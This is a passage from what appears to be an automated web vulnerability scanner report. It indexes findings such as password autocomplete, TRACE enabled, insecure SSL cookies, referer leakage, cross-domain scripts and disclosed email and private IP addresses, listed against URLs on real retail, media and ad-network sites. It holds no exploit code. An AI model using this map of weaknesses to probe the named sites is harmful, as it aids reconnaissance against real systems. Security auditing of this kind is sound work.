16.4. http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b3735b56bff791556b569e5e8e5242213410e46817a400930a8a5210c391eb4099bcdd45011c8c2b4edf7228481e91dc3f9c6351ac5eb78c686743ae34c0f193c0f5e25e2f9c11e68faf23a27751d30db21d18f34cfde0468a1a617f42a00cf7209ab4a9216327370b8d618eca71f90ecccf5415273b68aada887b54ba32604e61fcb904980258a678379798baa4414353b6f78ea033614b82e0ab09a5562e8c8d6a2c4c0b824a928c637f44222cd3c68a4f089e2c04760f501414adef2a7cca4fa49831a56ff1edcb91ce345c1d008e6f37a87293457074e626b842250ca5e307da3a5e46ffb4c736227395daeaaa5bc747ad115097fe63832d4021305db140de7cc84ebd182f34aa56da56d73a5ff1e5bcb2efdbf54edfb0fc746c5c8871b2ed942f4ea6203be921f533a8d8b6dfd5eb99b71b31a912f060e8d9da8ae0dd543ae249e956a8b64b1964d41954eca97247abd18e042fcb7170aed7bb7e0d7cee603452c43

16.5. http://shop.pacsun.com/

16.6. http://sony.links.origin.channelintelligence.com/pages/wl.asp

16.7. http://ttwbs.channelintelligence.com/

16.8. http://us.playstation.com/uwps/TickerMessages

16.9. http://www.fingerhut.com/

16.10. http://www.fingerhut.com/fingerhut/css/sifr-config.jsp

16.11. http://www.fingerhut.com/includes/financial_snapshot.jsp

16.12. http://www.fingerhut.com/js/config_dhtml.jsp

16.13. http://www.fingerhut.com/js/financial-snapshot.jsp

16.14. http://www.fingerhut.com/js/persistent_cart.jsp

16.15. http://www.fingerhut.com/js/s_code.jsp

16.16. http://www.fingerhut.com/js/scene7/scene7.jsp

16.17. http://www.fingerhut.com/js/sifr.jsp

16.18. https://www.fingerhut.com/fingerhut/css/sifr-config.jsp

16.19. https://www.fingerhut.com/js/persistent_cart.jsp

16.20. https://www.fingerhut.com/js/s_code.jsp

16.21. https://www.fingerhut.com/js/sifr.jsp

16.22. https://www.fingerhut.com/user/login.jsp

16.23. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

16.24. http://www.viddler.com/thumbnail/7d63c65a/

16.25. http://a.tribalfusion.com/j.ad

16.26. http://action.media6degrees.com/orbserv/hbpix

16.27. http://ad.turn.com/server/ads.js

16.28. http://ad.turn.com/server/pixel.htm

16.29. http://ad.yieldmanager.com/imp

16.30. http://ad.yieldmanager.com/pixel

16.31. http://ads.revsci.net/adserver/ako

16.32. http://adserver.veruta.com/track.fcgi

16.33. http://ak1.abmr.net/is/images3.pacsun.com

16.34. http://ak1.abmr.net/is/tag.admeld.com

16.35. http://ak1.abmr.net/is/tag.contextweb.com

16.36. http://ak1.abmr.net/is/www.imiclk.com

16.37. http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A

16.38. http://b.scorecardresearch.com/b

16.39. http://b.scorecardresearch.com/r

16.40. http://bh.contextweb.com/bh/rtset

16.41. http://c7.zedo.com/utils/ecSet.js

16.42. http://community.petco.com/discussions/Bird_Discussion_Forum/fd03p00v06d1

16.43. http://community.petco.com/discussions/Cat_Discussion_Forum/fd03p00v02d1

16.44. http://community.petco.com/discussions/Dog_Discussion_Forum/fd03p00v01d1

16.45. http://community.petco.com/discussions/Ferret_Discussion_Forum/fd03p00v07d1

16.46. http://community.petco.com/discussions/Fish_Discussion_Forum/fd03p00v03d1

16.47. http://community.petco.com/discussions/Reptile_Discussion_Forum/fd03p00v05d1

16.48. http://community.petco.com/discussions/Small_Animal_Discussion_Forum/fd03p00v04d1

16.49. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll

16.50. http://community.petco.com/n/blogs/blog.aspx

16.51. http://community.petco.com/n/pfx/forum.aspx

16.52. http://contextweb-match.dotomi.com/

16.53. http://ctix8.cheaptickets.com/dcssufut800000w4l0d2qm89z_3g4o/dcs.gif

16.54. http://cw-m.d.chango.com/m/cw

16.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

16.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

16.57. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

16.58. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

16.59. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

16.60. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/

16.61. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

16.62. http://data.adsrvr.org/map/cookie/contextweb

16.63. http://disneycruise.disney.go.com/reservations/customize

16.64. http://f.nexac.com/e/a-677/s-2140.xgi

16.65. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH

16.66. http://https.edge.ru4.com/smartserve/ad

16.67. http://i.w55c.net/ping_match.gif

16.68. http://idcs.interclick.com/Segment.aspx

16.69. http://idpix.media6degrees.com/orbserv/hbpix

16.70. http://image2.pubmatic.com/AdServer/Pug

16.71. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

16.72. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

16.73. http://js.revsci.net/gateway/gw.js

16.74. http://leadback.advertising.com/adcedge/lb

16.75. http://media.fastclick.net/w/tre

16.76. http://odb.outbrain.com/utils/get

16.77. http://odb.outbrain.com/utils/ping.html

16.78. http://optimized-by.rubiconproject.com/a/dk.js

16.79. http://p.brilig.com/contact/bct

16.80. http://pix04.revsci.net/D08734/a1/0/0/0.gif

16.81. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js

16.82. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js

16.83. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

16.84. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js

16.85. http://pixel.33across.com/ps/

16.86. http://pixel.invitemedia.com/data_sync

16.87. http://pixel.mathtag.com/event/img

16.88. http://pixel.quantserve.com/pixel

16.89. http://pixel.rubiconproject.com/tap.php

16.90. http://pixel.rubiconproject.com/tap.php

16.91. http://r.openx.net/set

16.92. http://r.turn.com/r/bd

16.93. http://r.turn.com/r/beacon

16.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF

16.95. http://r.turn.com/server/pixel.htm

16.96. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

16.97. http://sales.liveperson.net/hc/46281118/

16.98. http://sales.liveperson.net/hc/53965383/

16.99. http://sales.liveperson.net/hc/71737897/

16.100. http://secureshopping.mcafee.com/

16.101. http://secureshopping.mcafee.com/css/home.css

16.102. http://secureshopping.mcafee.com/css/public.css

16.103. http://secureshopping.mcafee.com/images/banner_arrow.gif

16.104. http://secureshopping.mcafee.com/images/banner_mfes_signup.gif

16.105. http://secureshopping.mcafee.com/images/banner_sa.gif

16.106. http://secureshopping.mcafee.com/images/banner_tp_081610.gif

16.107. http://secureshopping.mcafee.com/images/bgarea_690x250_cccccc.png

16.108. http://secureshopping.mcafee.com/images/btn_compare_up.gif

16.109. http://secureshopping.mcafee.com/images/btn_seeit_up.gif

16.110. http://secureshopping.mcafee.com/images/category_blank.png

16.111. http://secureshopping.mcafee.com/images/category_blank_background.jpg

16.112. http://secureshopping.mcafee.com/images/category_bottom.png

16.113. http://secureshopping.mcafee.com/images/category_top.png

16.114. http://secureshopping.mcafee.com/images/favicon.ico

16.115. http://secureshopping.mcafee.com/images/footer-search-bg.gif

16.116. http://secureshopping.mcafee.com/images/footer-search-left.gif

16.117. http://secureshopping.mcafee.com/images/footer-search-right.gif

16.118. http://secureshopping.mcafee.com/images/logo.gif

16.119. http://secureshopping.mcafee.com/images/nav-menu-bg.gif

16.120. http://secureshopping.mcafee.com/images/nav-menu-left.gif

16.121. http://secureshopping.mcafee.com/images/nav-menu-right.gif

16.122. http://secureshopping.mcafee.com/images/nav-menu-split.gif

16.123. http://secureshopping.mcafee.com/images/nav-menu-tab-bg.gif

16.124. http://secureshopping.mcafee.com/images/nav-menu-tab-left.gif

16.125. http://secureshopping.mcafee.com/images/nav-menu-tab-right.gif

16.126. http://secureshopping.mcafee.com/images/nav-search-bg.gif

16.127. http://secureshopping.mcafee.com/js/core.js

16.128. http://secureshopping.mcafee.com/js/ga_init.js

16.129. http://secureshopping.mcafee.com/js/ga_track_click.js

16.130. http://secureshopping.mcafee.com/js/ga_track_click_init.js

16.131. http://secureshopping.mcafee.com/js/google_ads_7409232867.js

16.132. http://segment-pixel.invitemedia.com/pixel

16.133. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

16.134. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/1/6dbb68f3-e8dc-464d-81c0-091488dbd2b9.P4Avatar.jpg

16.135. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/8/f80cbc5e-6704-417a-b8ad-a6e027a19299.P4Avatar.jpg

16.136. http://sitelife.usatoday.com/ver1.0/Content/images/store/9/9/792de6a9-477b-46db-891e-75ece59c0187.P4Avatar.jpg

16.137. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

16.138. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

16.139. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

16.140. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

16.141. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

16.142. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

16.143. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif

16.144. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

16.145. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

16.146. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png

16.147. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png

16.148. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

16.149. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

16.150. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

16.151. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

16.152. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

16.153. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

16.154. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

16.155. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

16.156. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

16.157. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

16.158. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

16.159. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

16.160. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

16.161. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

16.162. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

16.163. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

16.164. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

16.165. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

16.166. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

16.167. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

16.168. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

16.169. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

16.170. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

16.171. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

16.172. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

16.173. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

16.174. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

16.175. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

16.176. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js

16.177. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

16.178. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css

16.179. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css

16.180. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

16.181. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

16.182. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

16.183. http://sony.tcliveus.com/i

16.184. http://sync.mathtag.com/sync/img

16.185. http://t.invitemedia.com/track_imp

16.186. http://tag.admeld.com/ad/js/201/unitedstates/728x90/ros

16.187. http://tag.contextweb.com/TagPublish/getad.aspx

16.188. http://tags.bluekai.com/site/2948

16.189. http://tags.bluekai.com/site/3358

16.190. http://web.aisle7.net/jsapi/1.0/content.js

16.191. http://webtrends.telegraph.co.uk/dcsshgbi400000gscd62rrg43_4o2o/dcs.gif

16.192. http://www.imiclk.com/cgi/r.cgi

16.193. http://www.mcafeesecure.com/ads/1002/25

16.194. https://www.mcafeesecure.com/RatingVerify

16.195. http://www.orbitz.com/favicon.ico

16.196. http://www.passporterboards.com/forums/

16.197. http://www.revresda.com/js.ng/channel=blog&Section=main&adsize=160x600&CookieName=OSC&secure=false&site=orbitz&

16.198. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy

16.199. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

16.200. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

17. Password field with autocomplete enabled

17.1. http://disneycruise.disney.go.com/reservations/customize

17.2. http://localhost:50386/hoyt/Sitefinity/Startup

17.3. http://shoprunner.force.com/content/JsContentElementsGNC

17.4. http://shoprunner.force.com/content/JsContentElementsPET

17.5. https://www.fingerhut.com/user/login.jsp

17.6. http://www.passporterboards.com/forums/

17.7. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

17.8. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

17.9. http://www.viddler.com/file/7d63c65a/html5mobile/

18. ASP.NET debugging enabled

19. Referer-dependent response

19.1. http://a.tribalfusion.com/j.ad

19.2. http://ad.yieldmanager.com/imp

19.3. http://login.dotomi.com/ucm/UCMController

19.4. http://us.playstation.com/uwps/UsplaystationBlogs

19.5. http://www.facebook.com/plugins/like.php

19.6. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

20. Cross-domain POST

20.1. http://blog.us.playstation.com/

20.2. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/

21. SSL cookie without secure flag set

21.1. https://www.mcafeesecure.com/RatingVerify

21.2. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

22. Cross-domain Referer leakage

22.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel

22.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney

22.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28

22.4. http://ad.doubleclick.net/adi/N4764.cruisecritic/B3091233

22.5. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

22.6. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45

22.7. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

22.8. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

22.9. http://ad.doubleclick.net/adi/ta.cc.com.s/deals

22.10. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

22.11. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

22.12. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

22.13. http://ad.doubleclick.net/adi/x1.dt/dt

22.14. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

22.15. http://ad.turn.com/server/ads.js

22.16. http://adadvisor.net/adscores/g.js

22.17. http://admeld.adnxs.com/usersync

22.18. http://bh.contextweb.com/bh/drts

22.19. http://bp.specificclick.net/

22.20. http://choices.truste.com/ca

22.21. http://cm.g.doubleclick.net/pixel

22.22. http://cm.g.doubleclick.net/pixel

22.23. http://cm.g.doubleclick.net/pixel

22.24. http://cm.g.doubleclick.net/pixel

22.25. http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250

22.26. http://disneycruise.disney.go.com/reservations/customize

22.27. http://f.nexac.com/e/a-677/s-2140.xgi

22.28. http://f.nexac.com/e/a-677/s-2140.xgi

22.29. http://fls.doubleclick.net/activityi

22.30. http://fls.doubleclick.net/activityi

22.31. http://fls.doubleclick.net/activityi

22.32. http://fls.doubleclick.net/activityi

22.33. http://fls.doubleclick.net/activityi

22.34. http://fls.doubleclick.net/activityi

22.35. http://fls.doubleclick.net/activityj

22.36. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH

22.37. http://googleads.g.doubleclick.net/pagead/ads

22.38. http://googleads.g.doubleclick.net/pagead/ads

22.39. http://googleads.g.doubleclick.net/pagead/ads

22.40. http://googleads.g.doubleclick.net/pagead/ads

22.41. http://googleads.g.doubleclick.net/pagead/ads

22.42. http://googleads.g.doubleclick.net/pagead/ads

22.43. http://googleads.g.doubleclick.net/pagead/ads

22.44. http://googleads.g.doubleclick.net/pagead/ads

22.45. http://googleads.g.doubleclick.net/pagead/ads

22.46. http://googleads.g.doubleclick.net/pagead/ads

22.47. http://serv.adspeed.com/ad.php

22.48. http://sony.links.channelintelligence.com/pages/prices.asp

22.49. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

22.50. http://wow.weather.com/weather/wow/module/USNY0400

22.51. http://www.bhphotovideo.com/bnh/controller/home

22.52. http://www.cruisecritic.com/reviews/cruiseline.cfm

22.53. http://www.facebook.com/plugins/like.php

22.54. http://www.facebook.com/plugins/likebox.php

22.55. http://www.google.com/search

22.56. http://www.google.com/search

22.57. http://www.google.com/search

22.58. http://www.google.com/trends/hottrends

22.59. http://www.imiclk.com/cgi/r.cgi

22.60. http://www.magicalkingdoms.com/blog/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js

22.61. http://www.mcafeesecure.com/Link.sa

22.62. http://www.mcafeesecure.com/Link.sa

22.63. http://www.mcafeesecure.com/Link.sa

22.64. https://www.mcafeesecure.com/RatingVerify

22.65. https://www.mcafeesecure.com/us/legalinfo.jsp

22.66. http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html

22.67. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

22.68. http://www.siteadvisor.com/download/windows.html

22.69. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

22.70. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

22.71. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess

22.72. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy

22.73. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

22.74. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

22.75. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout

22.76. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

23. Cross-domain script include

23.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28

23.2. http://ad.doubleclick.net/adi/ta.cc.com.s/disney

23.3. http://ad.turn.com/server/ads.js

23.4. http://blog.us.playstation.com/

23.5. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/

23.6. http://cdn5.tribalfusion.com/media/1956006/frame.html

23.7. http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250

23.8. http://disneycruise.disney.go.com/reservations/customize

23.9. http://fls.doubleclick.net/activityi

23.10. http://fls.doubleclick.net/activityi

23.11. http://fls.doubleclick.net/activityi

23.12. http://googleads.g.doubleclick.net/pagead/ads

23.13. http://googleads.g.doubleclick.net/pagead/ads

23.14. http://googleads.g.doubleclick.net/pagead/ads

23.15. http://i.usatoday.net/_common/_scripts/_oas/google.js

23.16. http://pastebin.com/trends

23.17. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

23.18. http://secureshopping.mcafee.com/

23.19. http://sony.links.channelintelligence.com/pages/prices.asp

23.20. http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

23.21. http://www.cruisecritic.com/reviews/cruiseline.cfm

23.22. http://www.facebook.com/plugins/like.php

23.23. http://www.facebook.com/plugins/likebox.php

23.24. http://www.fingerhut.com/

23.25. https://www.fingerhut.com/user/login.jsp

23.26. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js

23.27. http://www.magicalkingdoms.com/blog/category/disneyland-paris/

23.28. http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp

23.29. https://www.mcafeesecure.com/RatingVerify

23.30. https://www.mcafeesecure.com/favicon.ico

23.31. http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html

23.32. http://www.siteadvisor.com/download/windows.html

23.33. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay

23.34. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess

23.35. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy

23.36. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

23.37. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

23.38. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

23.39. http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html

23.40. http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html

23.41. http://www.viddler.com/file/7d63c65a/html5mobile/

24. TRACE method is enabled

24.1. http://ads.pubmatic.com/

24.2. http://bh.contextweb.com/

24.3. http://d.xp1.ru4.com/

24.4. http://image2.pubmatic.com/

24.5. http://imawow.weather.com/

24.6. http://login.dotomi.com/

24.7. http://optimized-by.rubiconproject.com/

24.8. http://pixel.rubiconproject.com/

24.9. http://r.openx.net/

24.10. http://secure-us.imrworldwide.com/

24.11. http://track.pubmatic.com/

24.12. http://travel.travelocity.com/

24.13. http://ts.istrack.com/

24.14. http://webassets.scea.com/

24.15. http://widgets.outbrain.com/

24.16. http://wow.weather.com/

24.17. http://www.magicalkingdoms.com/

25. Email addresses disclosed

25.1. http://blog.us.playstation.com/wp-content/themes/twenty11/js/facebox.js

25.2. http://disneycruise.disney.go.com/reservations/customize

25.3. http://i.usatoday.net/_common/_scripts/jquery.cookie.js

25.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js

25.5. http://secureshopping.mcafee.com/

25.6. http://shop.pacsun.com/js_external/PS_external_validation.js

25.7. http://shoprunner.force.com/content/JsContentElementsGNC

25.8. http://shoprunner.force.com/content/JsContentElementsPET

25.9. http://static.bhphotovideo.com/FrameWork/js/common.js

25.10. http://static.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

25.11. http://widgets.outbrain.com/OutbrainRater.js

25.12. http://www.acehardware.com/js/LIB_core.js

25.13. http://www.cruisecritic.com/js/global.js

25.14. http://www.fingerhut.com/js/jquery.cookie.js

25.15. https://www.fingerhut.com/js/jquery.cookie.js

25.16. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js

25.17. http://www.guitarcenter.com/Includes/Guitarcenter/Guitarcenter.css

25.18. http://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js

25.19. http://www.magicalkingdoms.com/blog/category/disneyland-paris/

25.20. http://www.magicalkingdoms.com/blog/wp-content/plugins/jquery-colorbox/js/jquery.colorbox-min.js

25.21. https://www.mcafeesecure.com/us/legalinfo.jsp

25.22. http://www.passporterboards.com/forums/

25.23. http://www.petsmart.com/js/LIB_core.js

25.24. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js

25.25. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js

25.26. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

25.27. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

25.28. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

25.29. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

25.30. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

25.31. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

25.32. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm

25.33. http://www.telegraph.co.uk/template/ver1-0/js/jquery.tablesorter.js

25.34. http://www.travelguard.com/WorkArea/java/ektron.js

25.35. http://www.travelguard.com/tgi3/00common/js/tracking/s_code.js

26. Private IP addresses disclosed

26.1. http://api.ak.facebook.com/restserver.php

26.2. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

26.3. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

26.4. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

26.5. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

26.6. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.7. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.9. http://www.facebook.com/extern/login_status.php

26.10. http://www.facebook.com/plugins/like.php

26.11. http://www.facebook.com/plugins/like.php

26.12. http://www.facebook.com/plugins/like.php

26.13. http://www.facebook.com/plugins/like.php

26.14. http://www.facebook.com/plugins/like.php

26.15. http://www.facebook.com/plugins/like.php

26.16. http://www.facebook.com/plugins/like.php

26.17. http://www.facebook.com/plugins/like.php

26.18. http://www.facebook.com/plugins/like.php

26.19. http://www.facebook.com/plugins/like.php

26.20. http://www.facebook.com/plugins/like.php

26.21. http://www.facebook.com/plugins/like.php

26.22. http://www.facebook.com/plugins/like.php

26.23. http://www.facebook.com/plugins/like.php

26.24. http://www.facebook.com/plugins/like.php

26.25. http://www.facebook.com/plugins/like.php

26.26. http://www.facebook.com/plugins/like.php

26.27. http://www.facebook.com/plugins/like.php

26.28. http://www.facebook.com/plugins/like.php

26.29. http://www.facebook.com/plugins/like.php

26.30. http://www.facebook.com/plugins/like.php

26.31. http://www.facebook.com/plugins/like.php

26.32. http://www.facebook.com/plugins/like.php

26.33. http://www.facebook.com/plugins/like.php

26.34. http://www.facebook.com/plugins/like.php

26.35. http://www.facebook.com/plugins/likebox.php

26.36. http://www.google.com/sdch/vD843DpA.dct

26.37. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

26.38. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

26.39. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

26.40. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

27. Robots.txt file

